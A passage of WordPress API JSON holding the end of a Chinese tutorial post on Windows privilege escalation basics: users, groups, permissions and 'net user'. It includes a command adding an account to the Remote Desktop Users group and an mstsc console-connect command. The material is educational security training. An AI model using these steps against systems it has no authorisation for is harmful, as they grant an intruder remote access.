          \"1746603563680-167347d3-902e-4ef2-ac02-34fad2bc80e4.png\"<\/p>\n
          net localgroup \"Remote Desktop Users\" moonsec \/add<\/code><\/pre>\n
          \"1746603576470-bdab56bb-27cd-4310-92df-356e97d06350.png\"<\/p>\n
          \u7ec8\u7aef\u8d85\u51fa\u6700\u5927\u8fde\u63a5\u6570<\/h3>\n
          \u7ec8\u7aef\u8d85\u51fa\u6700\u5927\u8fde\u63a5\u6570\u65f6\u53ef\u7528\u4e0b\u9762\u7684\u547d \u4ee4\u6765\u8fde\u63a5<\/p>\n
          mstsc \/v:ip:3389 \/console<\/p>\n
          \n
          \u66f4\u65b0: 2025-05-07 15:40:22
          \n\u539f\u6587: https:\/\/www.yuque.com\/yuhui.net\/network\/aoaox0w4ssfnfkhg<\/a><\/p>\n<\/blockquote>\n","protected":false},"excerpt":{"rendered":"
          Windows\u63d0\u6743 \u57fa\u7840\u77e5\u8bc6 \u7528\u6237\u4e0e\u7528\u6237\u7ec4 \u5728windows\u4e0d\u7528\u7684\u7528\u6237\u6709\u7740\u4e0d\u540c\u7684\u6743\u9650\uff0c\u6743\u9650\u4e3b\u8981\u5305\u62ec\u6709\uff1a\u5b8c\u5168\u63a7\u5236\u3001\u4fee\u6539\u3001\u8bfb\u53d6\u548c\u6267\u884c\u3001\u5217\u51fa\u6587\u4ef6\u5939\u5185\u5bb9\u3001\u8bfb\u53d6\u3001\u5199\u5165\u3002 \u800c\u8d85\u7ea7\u7ba1\u7406\u5458\u548csystem\u7528\u6237\u6743\u9650\u6700\u9ad8 \u5185\u7f6e\u7528\u6237\uff1a Administrator\uff0c\u7cfb\u7edf\u7ba1\u7406\u5458\u8d26\u53f7\uff0c\u62e5\u6709\u5b8c\u5168\u63a7\u5236\u6743 guest\uff0c\u6765\u5bbe\u8d26\u53f7\uff0c\u63d0\u4f9b\u8bbf\u95ee\u5171\u4eab\u8d44\u6e90\u7684\u7f51\u7edc\u7528\u6237\u4f7f\u7528\uff0c\u4ec5\u5177\u6709\u57fa\u672c\u6743\u9650\uff0c\u9ed8\u8ba4\u88ab\u7981\u7528 net user \/\/\u67e5\u770b\u672c\u5730\u7528\u6237 net u […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[123,119,2],"tags":[17,22,28,32,43],"class_list":["post-793","post","type-post","status-publish","format-standard","hentry","category-tiquan","category-shentouceshijichu-network_sec","category-network_sec","tag-github","tag-windows","tag-kali","tag-install","tag-43"],"_links":{"self":[{"href":"https:\/\/www.youvii.site\/index.php\/wp-json\/wp\/v2\/posts\/793","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.youvii.site\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.youvii.site\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.youvii.site\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.youvii.site\/index.php\/wp-json\/wp\/v2\/comments?post=793"}],"version-history":[{"count":0,"href":"https:\/\/www.youvii.site\/index.php\/wp-json\/wp\/v2\/posts\/793\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.youvii.site\/index.php\/wp-json\/wp\/v2\/media?parent=793"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.youvii.site\/index.php\/wp-json\/wp\/v2\/categories?post=793"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.youvii.site\/index.php\/wp-json\/wp\/v2\/tags?post=793"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}